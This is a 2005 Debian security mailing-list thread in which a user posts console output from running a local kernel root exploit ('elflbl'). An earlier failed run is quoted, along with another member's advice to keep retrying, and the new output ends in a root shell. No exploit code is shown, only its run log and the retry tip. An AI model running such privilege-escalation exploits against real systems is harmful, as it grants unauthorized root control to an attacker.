Re: local root exploit
[+] SLAB cleanup
child 1 VMAs 65406
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xd4000000 - 0xe7ff1000
Wait... -
[+] race won maps=51294
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd4915000
[+] gate modified ( 0xffec90f4 0x0804ec00 )
[+] exploited, uid=0
sh-2.05a# whoami
root
On Mon, 10 Jan 2005 18:21:17 +0300, Boris B. Zhmurov <bb@kernelpanic.ru> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello, Carlos Tirado.
>
> On 10.01.2005 18:16 you said the following:
>
> | carlos@tuxsystem:~/security$ ./elflbl
> |
> | [+] SLAB cleanup
> | child 1 VMAs 605
> | [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
> | [+] vmalloc area 0xd4000000 - 0xe7ff1000
> | Wait... \
> | [-] FAILED: try again (-f switch) and again (Cannot allocate memory)
> ~ ^^^^^^^^^^
>
> Keyword is "again".
>
> - --
> Boris B. Zhmurov
> mailto: bb@kernelpanic.ru
> "wget http://kernelpanic.ru/bb_public_key.pgp -O - | gpg --import"
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.6 (GNU/Linux)
>
> iD8DBQFB4p1tmEQixi5w37YRAmcRAJ9+H4Hrkso5/EIZCroHwck19GdsYgCfUeAP
> aIMSt1HytYd7xD915Lf7cY8=
> =viUY
> -----END PGP SIGNATURE-----
>
> --
> To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>
>
--
Carlos Tirado E.
http://www.layapa.cl
Reply to: